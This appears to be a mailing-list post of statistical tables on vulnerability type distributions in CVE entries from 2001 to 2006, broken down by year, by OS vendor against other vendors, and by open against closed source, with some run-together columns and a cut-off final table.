01.1% (13) 01.2% (12) 01.0% (14) 01.4% (10) **** 01.1% (13) 01.4% (12) 00.9% (12) 01.0% ( 8) 00.4% (17) 01.6% ( 5) 01.1% (10) [11] metachar 01.5% ( 9) 03.2% ( 6) 02.9% ( 5) 01.5% (11) 00.6% (15) 01.4% (11) 00.5% (15) **** 00.5% (18) 01.0% (18) 01.2% (11) 00.0% N/A 00.4% (14) 00.5% (15) 00.0% N/A [12] race 01.4% (11) 02.3% ( 9) 01.8% (10) 00.4% (19) 01.7% ( 8) 01.6% ( 9) 00.8% (13) **** 00.3% (24) 00.0% N/A 00.0% N/A 00.5% (10) 00.0% N/A 00.8% (14) 00.3% (21) [13] sql-inject 01.2% (12) 00.5% (21) 00.7% (18) 01.9% ( 9) 00.9% (13) 01.6% (10) 01.4% (11) **** 00.4% (19) 00.0% N/A 00.6% (18) 00.5% (20) 00.4% (13) 00.0% N/A 00.8% (14) [14] memleak 00.9% (14) 00.0% N/A 00.7% (16) 01.1% (14) 01.4% ( 9) 01.2% (13) 00.3% (24) **** 00.9% (15) 04.3% ( 4) 00.3% (19) 00.5% (12) 00.0% N/A 00.8% (13) 00.3% (19) [15] crypt 00.7% (16) 01.8% (11) 00.7% (15) 01.9% ( 7) 00.0% N/A 00.4% (18) 00.3% (21) **** 00.9% (14) 01.0% (16) 02.1% ( 7) 00.0% N/A 00.8% (11) 00.5% (16) 00.5% (15) [16] sandbox 00.2% (26) 00.5% (15) 00.0% N/A 00.0% N/A 00.3% (20) 00.3% (23) 00.0% N/A **** 01.4% ( 8) 05.3% ( 3) 04.2% ( 3) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [17] dos-flood 00.3% (21) 01.4% (12) 00.4% (24) 00.0% N/A 00.0% N/A 00.3% (24) 00.0% N/A **** 01.1% (11) 03.9% ( 5) 00.9% (14) 00.5% (14) 00.8% ( 9) 00.3% (19) 01.3% ( 8) [18] relpath 00.6% (17) 01.8% (10) 00.7% (17) 00.4% (18) 00.3% (16) 00.4% (19) 00.5% (18) **** 00.7% (17) 01.4% (14) 00.0% N/A 00.5% (13) 01.9% ( 6) 00.0% N/A 01.1% (12) [19] auth 00.1% (28) 00.5% (16) 00.0% N/A 00.0% N/A 00.3% (17) 00.0% N/A 00.3% (20) **** 01.2% ( 9) 02.4% ( 7) 02.1% ( 8) 01.5% ( 6) 00.4% (15) 01.0% ( 6) 00.3% (18) [20] pass 00.0% (32) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (28) 00.0% N/A **** 01.1% (12) 00.5% (20) 01.5% (10) 00.5% (16) 02.3% ( 4) 00.8% (11) 01.1% ( 9) [21] signedness 00.8% (15) 00.5% (17) 01.8% (11) 01.5% (10) 00.3% (19) 00.6% (17) 00.5% (16) **** 00.2% (29) 00.0% N/A 00.0% N/A 00.5% (17) 00.0% N/A 00.5% (17) 00.0% N/A [22] double-free 00.6% (18) 00.0% N/A 00.4% (22) 01.1% (16) 00.9% (14) 00.3% (25) 00.8% (12) **** 00.2% (28) 00.0% N/A 00.0% N/A 00.5% (19) 00.8% (10) 00.3% (21) 00.0% N/A [23] spoof 00.2% (23) 00.0% N/A 00.7% (20) 00.0% N/A 00.0% N/A 00.4% (21) 00.0% N/A **** 00.3% (22) 00.5% (23) 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (20) 01.1% (11) [24] form-field 00.4% (20) 00.5% (20) 00.7% (19) 00.4% (20) 00.0% N/A 00.7% (16) 00.0% N/A **** 00.1% (31) 00.5% (21) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [25] crlf 00.5% (19) 00.0% N/A 01.1% (14) 00.0% N/A 00.0% N/A 00.7% (15) 00.5% (17) **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [26] rand 00.2% (22) 00.9% (13) 00.4% (21) 00.4% (17) 00.0% N/A 00.0% N/A 00.3% (22) **** 00.3% (23) 01.9% ( 9) 00.3% (22) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [27] default 00.1% (29) 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (18) 00.0% N/A 00.3% (23) **** 00.4% (20) 00.5% (24) 00.6% (16) 00.0% N/A 00.0% N/A 00.8% ( 9) 00.3% (16) [28] dos-release 00.1% (27) 00.5% (22) 00.4% (23) 00.4% (21) 00.0% N/A 00.0% N/A 00.0% N/A **** 00.2% (27) 01.4% (11) 00.3% (21) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [29] type-check 00.0% (34) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (26) 00.0% N/A **** 00.3% (21) 01.4% (15) 00.9% (15) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [30] CF 00.1% (30) 00.9% (14) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A **** 00.2% (26) 01.0% (19) 00.0% N/A 00.5% (18) 00.0% N/A 00.0% N/A 00.3% (22) [31] eval-inject 00.2% (24) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.4% (20) 00.5% (14) **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [32] php-include 00.2% (25) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.4% (22) 00.3% (19) **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [33] design 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A **** 00.2% (25) 00.5% (25) 00.3% (20) 00.5% (15) 00.0% N/A 00.3% (22) 00.0% N/A [34] webroot 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A **** 00.1% (30) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (20) [35] upload 00.0% (33) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (29) 00.0% N/A **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [36] CSRF 00.0% (31) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (27) 00.0% N/A **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A ------------------------- UNKNOWN/UNSPECIFIED ITEMS ------------------------- n/a unk 09.7% N/A 12.2% N/A 10.3% N/A 04.5% N/A 07.8% N/A 11.5% N/A 10.1% N/A **** 25.7% N/A 13.0% N/A 15.7% N/A 20.1% N/A 23.0% N/A 26.9% N/A 45.0% N/A n/a other 19.3% N/A 13.1% N/A 20.6% N/A 15.7% N/A 10.4% N/A 15.9% N/A 39.4% N/A **** 12.4% N/A 18.8% N/A 12.7% N/A 05.0% N/A 14.9% N/A 10.7% N/A 12.4% N/A n/a not-specified 13.4% N/A 00.0% N/A 04.4% N/A 21.6% N/A 21.9% N/A 20.5% N/A 00.8% N/A **** 13.2% N/A 00.5% N/A 06.3% N/A 28.6% N/A 22.6% N/A 24.3% N/A 00.5% N/A -------------- next part --------------

Vulnerability Type Distributions in CVE - Tables


Table 1: Overall Results

RankFlaw TOTAL200120022003200420052006
Total16192143421381173253445384375
[ 1]XSS13.9%02.2% (11)08.7% ( 2)07.5% ( 2)10.9% ( 2)16.0% ( 1)21.5% ( 1)
2247 32 187 88 276 725 939
[ 2]buf13.3%19.5% ( 1)20.3% ( 1)22.5% ( 1)15.4% ( 1)09.8% ( 3)07.9% ( 4)
2156 279 433 264 391 445 344
[ 3]sql-inject08.7%00.4% (27)01.8% (12)03.0% ( 4)05.5% ( 3)12.9% ( 2)14.0% ( 2)
1416 6 38 35 140 584 613
[ 4]dot04.7%08.9% ( 2)05.1% ( 3)02.9% ( 5)04.1% ( 4)04.3% ( 4)04.4% ( 5)
764 127 110 34 104 195 194
[ 5]php-include03.5%00.1% (31)00.3% (30)00.8% (15)01.4% (10)02.1% ( 6)09.5% ( 3)
561 1 6 9 36 95 414
[ 6]infoleak03.3%02.6% ( 9)04.2% ( 5)02.6% ( 7)03.7% ( 5)03.9% ( 5)02.6% ( 6)
540 37 89 30 95 175 114
[ 7]dos-malform02.9%04.8% ( 3)05.1% ( 4)02.5% ( 8)03.4% ( 6)01.8% ( 8)02.0% ( 7)
463 69 110 29 87 82 86
[ 8]link02.0%04.5% ( 4)02.1% ( 9)03.5% ( 3)02.8% ( 7)01.9% ( 7)00.5% (16)
329 64 45 41 72 87 20
[ 9]format-string01.8%03.2% ( 7)01.8% (11)02.7% ( 6)02.4% ( 8)01.7% ( 9)01.0% (10)
296 46 39 32 61 76 42
[10]crypt01.6%03.8% ( 6)02.7% ( 6)01.5% ( 9)00.9% (16)01.5% (10)00.9% (11)
261 55 58 18 22 68 40
[11]priv01.4%02.5% (10)02.2% ( 8)01.0% (12)01.3% (11)01.5% (11)00.9% (12)
233 36 46 12 32 67 40
[12]metachar01.3%03.8% ( 5)02.6% ( 7)00.7% (17)01.0% (14)01.3% (12)00.3% (20)
218 55 56 8 26 59 14
[13]perm01.3%02.7% ( 8)01.8% (10)01.3% (11)00.9% (15)01.1% (13)01.1% ( 9)
215 39 39 15 24 48 50
[14]int-overflow01.0%00.1% (32)00.4% (22)01.4% (10)01.9% ( 9)00.8% (15)01.2% ( 8)
160 1 8 16 47 36 52
[15]dos-flood00.8%02.0% (12)01.7% (13)00.5% (19)01.2% (12)00.2% (27)00.4% (17)
131 29 36 6 31 10 19
[16]pass00.8%01.1% (18)01.3% (14)00.2% (28)01.1% (13)00.8% (14)00.4% (18)
125 16 27 2 28 36 16
[17]auth00.8%01.5% (13)01.3% (15)00.5% (20)00.7% (17)00.5% (19)00.7% (14)
124 22 27 6 17 21 31
[18]webroot00.5%00.1% (29)00.2% (32)00.3% (24)00.2% (30)00.7% (16)00.9% (13)
88 2 5 3 5 33 40
[19]form-field00.5%00.7% (24)00.8% (17)00.5% (21)00.2% (27)00.4% (20)00.5% (15)
81 10 17 6 6 19 23
[20]relpath00.4%00.8% (22)00.3% (29)00.9% (14)00.6% (18)00.3% (22)00.3% (21)
71 12 6 10 14 15 14
[21]race00.4%00.5% (26)00.4% (24)00.6% (18)00.4% (21)00.6% (17)00.3% (24)
69 7 8 7 10 26 11
[22]memleak00.4%01.1% (17)00.2% (31)00.4% (22)00.5% (19)00.3% (23)00.2% (27)
61 16 5 5 13 15 7
[23]msdos-device00.4%01.0% (20)00.6% (19)00.9% (13)00.2% (23)00.2% (28)00.0% (32)
57 15 13 11 6 10 2
[24]crlf00.3%...00.2% (33)00.1% (30)00.5% (20)00.4% (21)00.3% (19)
49 0 4 1 13 17 14
[25]default00.3%01.1% (16)00.7% (18)00.1% (33)00.2% (26)00.1% (33)00.1% (29)
48 16 16 1 6 3 6
[26]spoof00.3%01.0% (19)00.3% (28)00.1% (32)00.1% (33)00.2% (26)00.3% (25)
48 15 7 1 3 11 11
[27]sandbox00.3%01.2% (15)01.0% (16)...00.2% (29)00.0% (34)...
46 17 22 0 5 2 0
[28]rand00.3%01.2% (14)00.6% (20)00.3% (25)00.2% (32)00.0% (35)00.2% (26)
45 17 12 3 4 2 7
[29]upload00.3%...00.0% (36)00.1% (29)00.2% (24)00.5% (18)00.3% (22)
43 0 1 1 6 22 13
[30]signedness00.2%00.1% (30)00.4% (23)00.8% (16)00.2% (25)00.3% (24)00.0% (34)
38 1 8 9 6 12 2
[31]dos-release00.2%00.9% (21)00.5% (21)00.2% (27)00.2% (31)......
30 13 10 2 5 0 0
[32]CF00.2%00.7% (23)00.3% (27)00.2% (26)...00.1% (31)00.1% (28)
29 10 7 2 0 4 6
[33]eval-inject00.2%.........00.0% (34)00.2% (25)00.3% (23)
25 0 0 0 1 11 13
[34]design00.1%00.6% (25)00.4% (26)00.1% (31)00.0% (35)00.1% (32)00.0% (31)
23 8 8 1 1 3 2
[35]double-free00.1%...00.1% (34)00.3% (23)00.2% (22)00.1% (30)00.1% (30)
21 0 2 4 6 5 4
[36]CSRF00.1%...00.0% (35)...00.2% (28)00.2% (29)00.0% (33)
16 0 1 0 5 8 2
[37]type-check00.1%00.4% (28)00.4% (25)......00.0% (36)00.0% (35)
16 6 8 0 0 1 1
UNKNOWN/UNSPECIFIED ITEMS
n/a unk09.0%07.9%07.1%07.0%08.2%08.9%11.5%
1460 114 151 82 209 402 502
n/a other15.2%16.7%19.0%11.8%17.2%13.1%14.9%
2468 239 407 139 435 595 653
n/a not-specified06.9%00.1%03.1%20.5%11.3%11.3%00.3%
1121 2 66 240 286 513 14

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top nTOTAL200120022003200420052006
544.141.543.439.439.646.957.3
1055.756.354.850.151.555.965.2


Table 2: OS Vendors

RankFlaw TOTAL200120022003200420052006
Total4418 443 660 527 7361199 853
[ 1]buf20.0%21.0% ( 1)26.8% ( 1)24.9% ( 1)20.4% ( 1)16.2% ( 1)16.1% ( 1)
882 93 177 131 150 194 137
[ 2]link04.0%07.4% ( 2)03.3% ( 4)04.0% ( 2)05.2% ( 2)04.0% ( 3)01.8% ( 5)
177 33 22 21 38 48 15
[ 3]dos-malform03.7%05.6% ( 3)06.1% ( 2)02.7% ( 4)04.5% ( 4)01.8% ( 7)03.3% ( 4)
162 25 40 14 33 22 28
[ 4]XSS03.4%01.6% (12)04.4% ( 3)03.0% ( 3)01.4% ( 7)04.2% ( 2)04.7% ( 3)
152 7 29 16 10 50 40
[ 5]int-overflow02.7%...01.2% (12)02.3% ( 6)04.6% ( 3)02.1% ( 6)04.7% ( 2)
119 0 8 12 34 25 40
[ 6]format-string02.4%05.2% ( 4)01.5% (10)02.3% ( 5)02.6% ( 5)02.4% ( 5)01.6% ( 7)
107 23 10 12 19 29 14
[ 7]priv02.0%04.1% ( 5)02.3% ( 6)00.8% (13)00.8% (14)02.6% ( 4)01.6% ( 6)
88 18 15 4 6 31 14
[ 8]perm01.8%04.1% ( 6)02.1% ( 7)01.1% (11)01.1% (10)01.7% ( 8)01.4% ( 9)
78 18 14 6 8 20 12
[ 9]dot01.4%01.6% (13)01.5% ( 9)01.1% ( 8)01.6% ( 6)01.3% (12)01.6% ( 8)
64 7 10 6 12 15 14
[10]metachar01.2%02.0% ( 9)02.6% ( 5)00.8% (16)00.7% (17)01.3% (11)00.4% (19)
53 9 17 4 5 15 3
[11]infoleak01.2%00.9% (20)01.2% (13)01.1% ( 9)01.1% ( 9)01.3% (10)01.2% (10)
52 4 8 6 8 16 10
[12]race01.0%01.1% (17)00.9% (15)00.4% (19)01.0% (11)01.6% ( 9)00.7% (13)
45 5 6 2 7 19 6
[13]memleak00.8%02.0% (10)00.6% (19)00.8% (14)01.0% (12)00.9% (14)00.2% (23)
37 9 4 4 7 11 2
[14]sql-inject00.8%00.2% (27)00.6% (21)01.1% (10)00.7% (16)00.9% (13)00.9% (11)
35 1 4 6 5 11 8
[15]crypt00.8%01.6% (14)01.4% (11)01.1% ( 7)00.4% (18)00.4% (18)00.5% (16)
34 7 9 6 3 5 4
[16]sandbox00.7%02.7% ( 7)02.1% ( 8)...00.1% (23)00.2% (28)...
29 12 14 0 1 2 0
[17]relpath00.6%01.6% (11)00.3% (28)00.4% (18)01.1% ( 8)00.3% (27)00.7% (14)
28 7 2 2 8 3 6
[18]dos-flood00.6%02.5% ( 8)00.6% (20)00.2% (22)00.3% (20)00.3% (25)00.8% (12)
28 11 4 1 2 3 7
[19]auth00.5%01.4% (15)01.1% (14)00.6% (17)00.3% (21)00.3% (21)00.2% (24)
24 6 7 3 2 4 2
[20]signedness00.5%00.2% (24)00.9% (16)00.9% (12)00.4% (19)00.6% (15)00.2% (25)
24 1 6 5 3 7 2
[21]pass00.5%00.2% (25)00.8% (17)00.2% (20)00.8% (15)00.3% (24)00.5% (15)
21 1 5 1 6 4 4
[22]double-free00.4%...00.3% (29)00.8% (15)00.8% (13)00.3% (20)00.4% (18)
19 0 2 4 6 4 3
[23]rand00.3%01.4% (16)00.5% (22)00.2% (27)00.1% (24)...00.2% (27)
13 6 3 1 1 0 2
[24]crlf00.2%...00.5% (23)00.2% (25)...00.4% (17)00.2% (20)
11 0 3 1 0 5 2
[25]spoof00.2%00.2% (26)00.3% (26)......00.3% (23)00.5% (17)
11 1 2 0 0 4 4
[26]form-field00.2%00.5% (22)00.3% (27)00.2% (21)...00.4% (16)...
10 2 2 1 0 5 0
[27]default00.2%00.2% (28)00.5% (24)...00.1% (22)00.3% (26)00.2% (21)
10 1 3 0 1 3 2
[28]type-check00.2%00.7% (21)00.6% (18)......00.1% (30)...
8 3 4 0 0 1 0
[29]CF00.2%00.9% (18)00.2% (31)00.2% (26)......00.1% (29)
7 4 1 1 0 0 1
[30]dos-release00.2%00.9% (19)00.3% (25)00.2% (23).........
7 4 2 1 0 0 0
[31]php-include00.1%............00.3% (19)00.2% (26)
6 0 0 0 0 4 2
[32]eval-inject00.1%............00.3% (22)00.2% (22)
6 0 0 0 0 4 2
[33]design00.1%00.2% (23)00.3% (30)00.2% (24)...00.1% (31)...
5 1 2 1 0 1 0
[34]webroot00.0%...............00.1% (28)
1 0 0 0 0 0 1
[35]upload00.0%............00.1% (32)...
1 0 0 0 0 1 0
[36]CSRF00.0%............00.1% (29)...
1 0 0 0 0 1 0
UNKNOWN/UNSPECIFIED ITEMS
n/a unk16.0%12.4%12.6%10.4%12.2%16.1%27.2%
708 55 83 55 90 193 232
n/a other16.4%15.3%15.6%12.0%12.2%14.4%26.6%
724 68 103 63 90 173 227
n/a not-specified14.3%00.2%05.9%26.0%24.6%22.2%00.8%
631 1 39 137 181 266 7

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top nTOTAL200120022003200420052006
533.843.343.236.937.329.430.6
1042.656.652.743.643.637.938


Table 3: OS Vendors vs. Others

RankFlaw TOTAL200120022003200420052006
TotalOS-ven4418 443 660 527 7361199 853
Other11774 9911478 646179833393522
[ 1]XSS03.4%01.6% (13)04.4% ( 3)03.0% ( 3)01.4% ( 7)04.2% ( 2)04.7% ( 2)
152 7 29 16 10 50 40
17.8%02.5% ( 8)10.7% ( 2)11.1% ( 2)14.8% ( 1)20.2% ( 1)25.5% ( 1)
2095 25 158 72 266 675 899
[ 2]buf20.0%21.0% ( 1)26.8% ( 1)24.9% ( 1)20.4% ( 1)16.2% ( 1)16.1% ( 1)
882 93 177 131 150 194 137
10.8%18.8% ( 1)17.3% ( 1)20.6% ( 1)13.4% ( 2)07.5% ( 3)05.9% ( 4)
1274 186 256 133 241 251 207
[ 3]sql-inject00.8%00.2% (27)00.6% (19)01.1% ( 8)00.7% (16)00.9% (13)00.9% (11)
35 1 4 6 5 11 8
11.7%00.5% (26)02.3% ( 8)04.5% ( 3)07.5% ( 3)17.2% ( 2)17.2% ( 2)
1381 5 34 29 135 573 605
[ 4]dot01.4%01.6% (14)01.5% ( 9)01.1% (10)01.6% ( 6)01.3% (11)01.6% ( 8)
64 7 10 6 12 15 14
05.9%12.1% ( 2)06.8% ( 3)04.3% ( 4)05.1% ( 4)05.4% ( 4)05.1% ( 5)
700 120 100 28 92 180 180
[ 5]php-include00.1%............00.3% (19)00.2% (27)
6 0 0 0 0 4 2
04.7%00.1% (30)00.4% (22)01.4% (11)02.0% ( 8)02.7% ( 6)11.7% ( 3)
555 1 6 9 36 91 412
[ 6]infoleak01.2%00.9% (20)01.2% (13)01.1% (11)01.1% ( 9)01.3% (10)01.2% (10)
52 4 8 6 8 16 10
04.1%03.3% ( 6)05.5% ( 4)03.7% ( 5)04.8% ( 5)04.8% ( 5)03.0% ( 6)
488 33 81 24 87 159 104
[ 7]dos-malform03.7%05.6% ( 3)06.1% ( 2)02.7% ( 4)04.5% ( 4)01.8% ( 7)03.3% ( 4)
162 25 40 14 33 22 28
02.6%04.4% ( 5)04.7% ( 5)02.3% ( 8)03.0% ( 6)01.8% ( 8)01.6% ( 7)
301 44 70 15 54 60 58
[ 8]link04.0%07.4% ( 2)03.3% ( 4)04.0% ( 2)05.2% ( 2)04.0% ( 3)01.8% ( 5)
177 33 22 21 38 48 15
01.3%03.1% ( 7)01.6% (13)03.1% ( 7)01.9% ( 9)01.2% (11)00.1% (25)
152 31 23 20 34 39 5
[ 9]format-string02.4%05.2% ( 4)01.5% (10)02.3% ( 6)02.6% ( 5)02.4% ( 5)01.6% ( 6)
107 23 10 12 19 29 14
01.6%02.3% ( 9)02.0% (11)03.1% ( 6)02.3% ( 7)01.4% ( 9)00.8% (12)
189 23 29 20 42 47 28
[10]crypt00.8%01.6% (12)01.4% (11)01.1% ( 9)00.4% (19)00.4% (16)00.5% (15)
34 7 9 6 3 5 4
01.9%04.8% ( 3)03.3% ( 6)01.9% ( 9)01.1% (14)01.9% ( 7)01.0% (10)
227 48 49 12 19 63 36
[11]priv02.0%04.1% ( 5)02.3% ( 6)00.8% (16)00.8% (13)02.6% ( 4)01.6% ( 7)
88 18 15 4 6 31 14
01.2%01.8% (12)02.1% (10)01.2% (14)01.4% (11)01.1% (12)00.7% (13)
145 18 31 8 26 36 26
[12]metachar01.2%02.0% (10)02.6% ( 5)00.8% (15)00.7% (17)01.3% (12)00.4% (19)
53 9 17 4 5 15 3
01.4%04.6% ( 4)02.6% ( 7)00.6% (20)01.2% (13)01.3% (10)00.3% (21)
165 46 39 4 21 44 11
[13]perm01.8%04.1% ( 6)02.1% ( 7)01.1% ( 7)01.1% (10)01.7% ( 8)01.4% ( 9)
78 18 14 6 8 20 12
01.2%02.1% (10)01.7% (12)01.4% (12)00.9% (15)00.8% (15)01.1% ( 9)
137 21 25 9 16 28 38
[14]int-overflow02.7%...01.2% (12)02.3% ( 5)04.6% ( 3)02.1% ( 6)04.7% ( 3)
119 0 8 12 34 25 40
00.3%00.1% (31)...00.6% (18)00.7% (17)00.3% (21)00.3% (17)
41 1 0 4 13 11 12
[15]dos-flood00.6%02.5% ( 8)00.6% (18)00.2% (27)00.3% (21)00.3% (26)00.8% (12)
28 11 4 1 2 3 7
00.9%01.8% (11)02.2% ( 9)00.8% (17)01.6% (10)00.2% (23)00.3% (18)
103 18 32 5 29 7 12
[16]pass00.5%00.2% (25)00.8% (17)00.2% (26)00.8% (15)00.3% (20)00.5% (17)
21 1 5 1 6 4 4
00.9%01.5% (16)01.5% (14)00.2% (27)01.2% (12)01.0% (14)00.3% (16)
104 15 22 1 22 32 12
[17]auth00.5%01.4% (15)01.1% (14)00.6% (17)00.3% (20)00.3% (23)00.2% (23)
24 6 7 3 2 4 2
00.8%01.6% (13)01.4% (15)00.5% (22)00.8% (16)00.5% (17)00.8% (11)
100 16 20 3 15 17 29
[18]webroot00.0%...............00.1% (28)
1 0 0 0 0 0 1
00.7%00.2% (28)00.3% (26)00.5% (21)00.3% (26)01.0% (13)01.1% ( 8)
87 2 5 3 5 33 39
[19]form-field00.2%00.5% (22)00.3% (26)00.2% (21)...00.4% (18)...
10 2 2 1 0 5 0
00.6%00.8% (20)01.0% (16)00.8% (15)00.3% (23)00.4% (18)00.7% (14)
71 8 15 5 6 14 23
[20]relpath00.6%01.6% (11)00.3% (25)00.4% (19)01.1% ( 8)00.3% (27)00.7% (13)
28 7 2 2 8 3 6
00.4%00.5% (25)00.3% (27)01.2% (13)00.3% (22)00.4% (19)00.2% (22)
43 5 4 8 6 12 8
[21]race01.0%01.1% (17)00.9% (16)00.4% (18)01.0% (12)01.6% ( 9)00.7% (14)
45 5 6 2 7 19 6
00.2%00.2% (29)00.1% (29)00.8% (16)00.2% (30)00.2% (27)00.1% (24)
24 2 2 5 3 7 5
[22]memleak00.8%02.0% ( 9)00.6% (20)00.8% (13)01.0% (11)00.9% (14)00.2% (25)
37 9 4 4 7 11 2
00.2%00.7% (22)00.1% (33)00.2% (29)00.3% (19)00.1% (30)00.1% (26)
24 7 1 1 6 4 5
[23]msdos-device00.0%..................
0 0 0 0 0 0 0
00.5%01.5% (15)00.9% (17)01.7% (10)00.3% (21)00.3% (22)00.1% (31)
57 15 13 11 6 10 2
[24]crlf00.2%...00.5% (23)00.2% (25)...00.4% (17)00.2% (24)
11 0 3 1 0 5 2
00.3%...00.1% (34)...00.7% (18)00.4% (20)00.3% (19)
38 0 1 0 13 12 12
[25]spoof00.2%00.2% (28)00.3% (29)......00.3% (21)00.5% (16)
11 1 2 0 0 4 4
00.3%01.4% (17)00.3% (25)00.2% (28)00.2% (29)00.2% (25)00.2% (23)
37 14 5 1 3 7 7
[26]default00.2%00.2% (26)00.5% (24)...00.1% (22)00.3% (25)00.2% (26)
10 1 3 0 1 3 2
00.3%01.5% (14)00.9% (18)00.2% (26)00.3% (27)...00.1% (29)
38 15 13 1 5 0 4
[27]sandbox00.7%02.7% ( 7)02.1% ( 8)...00.1% (24)00.2% (28)...
29 12 14 0 1 2 0
00.1%00.5% (24)00.5% (20)...00.2% (28)......
17 5 8 0 4 0 0
[28]rand00.3%01.4% (16)00.5% (22)00.2% (23)00.1% (23)...00.2% (22)
13 6 3 1 1 0 2
00.3%01.1% (18)00.6% (19)00.3% (23)00.2% (32)00.1% (32)00.1% (28)
32 11 9 2 3 2 5
[29]upload00.0%............00.1% (32)...
1 0 0 0 0 1 0
00.4%...00.1% (32)00.2% (30)00.3% (20)00.6% (16)00.4% (15)
42 0 1 1 6 21 13
[30]signedness00.5%00.2% (24)00.9% (15)00.9% (12)00.4% (18)00.6% (15)00.2% (20)
24 1 6 5 3 7 2
00.1%...00.1% (30)00.6% (19)00.2% (31)00.1% (28)...
14 0 2 4 3 5 0
[31]dos-release00.2%00.9% (19)00.3% (30)00.2% (20).........
7 4 2 1 0 0 0
00.2%00.9% (19)00.5% (21)00.2% (25)00.3% (25)......
23 9 8 1 5 0 0
[32]CF00.2%00.9% (18)00.2% (31)00.2% (24)......00.1% (29)
7 4 1 1 0 0 1
00.2%00.6% (23)00.4% (23)00.2% (24)...00.1% (29)00.1% (27)
22 6 6 1 0 4 5
[33]eval-inject00.1%............00.3% (22)00.2% (21)
6 0 0 0 0 4 2
00.2%.........00.1% (34)00.2% (26)00.3% (20)
19 0 0 0 1 7 11
[34]design00.1%00.2% (23)00.3% (27)00.2% (22)...00.1% (30)...
5 1 2 1 0 1 0
00.2%00.7% (21)00.4% (24)...00.1% (33)00.1% (31)00.1% (32)
18 7 6 0 1 2 2
[35]double-free00.4%...00.3% (28)00.8% (14)00.8% (14)00.3% (24)00.4% (18)
19 0 2 4 6 4 3
00.0%............00.0% (33)00.0% (33)
2 0 0 0 0 1 1
[36]type-check00.2%00.7% (21)00.6% (21)......00.1% (31)...
8 3 4 0 0 1 0
00.1%00.3% (27)00.3% (28).........00.0% (34)
8 3 4 0 0 0 1
[37]CSRF00.0%............00.1% (29)...
1 0 0 0 0 1 0
00.1%...00.1% (31)...00.3% (24)00.2% (24)00.1% (30)
15 0 1 0 5 7 2
UNKNOWN/UNSPECIFIED ITEMS
n/a unk16.0%12.4%12.6%10.4%12.2%16.1%27.2%
708 55 83 55 90 193 232
06.4%06.0%04.6%04.2%06.6%06.3%07.7%
752 59 68 27 119 209 270
n/a other16.4%15.3%15.6%12.0%12.2%14.4%26.6%
724 68 103 63 90 173 227
14.8%17.3%20.6%11.8%19.2%12.6%12.1%
1744 171 304 76 345 422 426
n/a not-specified14.3%00.2%05.9%26.0%24.6%22.2%00.8%
631 1 39 137 181 266 7
04.2%00.1%01.8%15.9%05.8%07.4%00.2%
490 1 27 103 105 247 7

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top nTOTAL200120022003200420052006
533.843.343.236.937.329.430.6
50.944.74544.245.655.165.4
1042.656.652.743.643.637.938
62.55857.556.356.464.273.2


Table 4: Open and Closed Source (OS vendors)

RankFlaw TOTAL200120022003200420052006
TotalOpenraw numbers omitted
Closedraw numbers omitted
[ 1]buf19.7%20.3% ( 1)24.6% ( 1)25.0% ( 1)24.5% ( 1)14.6% ( 1)17.1% ( 1)
20.4%20.3% ( 1)27.7% ( 1)26.1% ( 1)15.3% ( 1)18.5% ( 1)16.3% ( 1)
[ 2]link06.4%14.0% ( 2)04.8% ( 3)04.9% ( 2)08.6% ( 2)06.1% ( 2)02.4% ( 5)
01.6%01.0% (17)01.8% ( 9)03.0% ( 2)01.9% ( 5)00.8% ( 7)01.6% ( 6)
[ 3]dos-malform02.8%02.7% ( 7)04.4% ( 4)02.6% ( 6)03.5% ( 5)01.7% ( 8)03.3% ( 4)
05.3%09.2% ( 2)08.1% ( 2)02.5% ( 3)07.3% ( 2)02.1% ( 3)03.9% ( 3)
[ 4]XSS04.6%02.7% ( 8)05.9% ( 2)03.0% ( 5)01.4% (10)05.5% ( 3)07.1% ( 2)
02.3%00.5% (22)03.6% ( 4)02.5% ( 4)00.8% ( 8)02.1% ( 4)03.2% ( 4)
[ 5]format-string04.0%08.6% ( 3)02.9% ( 6)03.0% ( 4)04.9% ( 3)03.7% ( 4)02.4% ( 6)
00.8%01.4% (13)00.6% (17)02.0% ( 5)00.4% (18)00.8% (10)00.3% (17)
[ 6]int-overflow02.6%...02.2% ( 7)03.4% ( 3)04.0% ( 4)02.2% ( 7)03.5% ( 3)
